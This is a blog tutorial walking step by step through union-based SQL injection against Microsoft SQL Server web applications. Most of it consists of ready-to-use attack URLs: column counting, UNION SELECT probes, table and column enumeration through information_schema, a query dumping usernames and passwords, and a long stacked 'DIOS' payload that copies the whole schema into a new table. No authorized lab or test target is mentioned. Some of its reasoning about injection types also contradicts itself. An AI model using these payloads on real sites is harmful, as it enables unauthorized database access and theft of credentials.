MSSQL Union Based Injection Step By Step

MSSQL Union Based Injection Step By Step

MSSQL Union Based Injection Step By Step

Today I am going to show you MSSQL Union Based Injection Step By Step. In this post I will only cover from basics. I don’t see a lot of detailed tutorials on the Internet so I am going to do what I can to help out based on my experience with MS SQL Injections. first of all we need to know the basics of injecting, all the basics including finding the type of injection, database testing and finding the columns etc are same to other databases so i ll suggest you to read the basics before you start here if you don’t read them yet.

so, lets start 😀 ………..

  • So the checking part is same as MySQL first putting single quote and then putting double quote checking the error and i came to know this one is single quote based injection.
www.site.com/?id=1%27 [ Error ]
www.site.com/?id=1%22 [ Error ]

RememberWhen both Single quote and double Quotes gives error then there are high probablities that the injection type is integer based because Single quote based then double quote do not give error and when the injection is double quote based then single quote do not give error, and when both single quote and double quotes give error then apply the golden rule that the injection is integer type.

  • Now lets break and fix the query
    www.site.com/?id=1 -- - [ Working Fine ]
    www.site.com/?id=1 order by 5-- - [ Working Fine ]
    www.site.com/?id=1 order by 6-- - [ Error ]

    That means total number of columns are 5.

  • Now we can continue with order by and in the end we come to know that 5 is the last working column. Now the next part is using using the union select query.
www.site.com/?id=1 and false UnIoN SeLeCt 1,2,3,4,5-- -
MSSQL Union Based Injection Step By Step

If you get this error then in such cases we have an option to use null.

www.site.com/?id=1 and false UnIoN SeLeCt null,null,null,null,null-- -
  • so now we have to use have to convert each column one by one to @@version or db_name() that you will see in video how I did ;).
  • Now when we will put @@version in the column and if the column is vulnerable then it shows version something like this..
    MSSQL Union Based Injection Step By Step

There are some other ways also to collect some more information from MSSQL which are given here:

  1. @@version – Gives version
  2. db_name() – Gives the name of database()
  3. user,system_user,current_user,user_name – Gives the current user.
  4. @@SERVERNAME – Gives the info. about Hostname.
  • Now we will extract the table names, here the syntax is a little bit different than MySQL of lack of limit clause in MSSQL.
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--
  • In this way Increase the top value. But in video I have shown only diosing site.
  • Now in same manner we can extract the column name. let’s see..
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 1 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 2 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
  • Now lets dump the data from tables and columns. here for concatenation we can use %2b which is ‘ + ‘ .
http://site.com/?id=1 and false Union All Select 1,username%2b' '%2bpassword,3,db_name(),5 from from table name here --

Now we have done this almost. Now lets come to diosing part.

This dios have been created by my friends Zen and Rummy. By Diosing the site we can make the whole process faster.

How to Dios the Mssql Site:

Dios

;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--

  • Just remove the union select and fix the query then add dios and execute as shown below for more details see video.
http://site.com/?id=1;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--
  • It will give error but actually its making the DIOS table so now lets try checking the output under Ahmed1.

MSSQL Union Based Injection Step By Step

  • And here we got compete output at once. Before i finish i ll like to show you some basic errors in MSSQLi.

So here we finish MSSQL Union Based Injection. Keep practicing and learning guys..

Author: Ahmed Raza Memon

I am 17 years old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer From the India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been Acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many More...

2 thoughts on “MSSQL Union Based Injection Step By Step”

Leave a Reply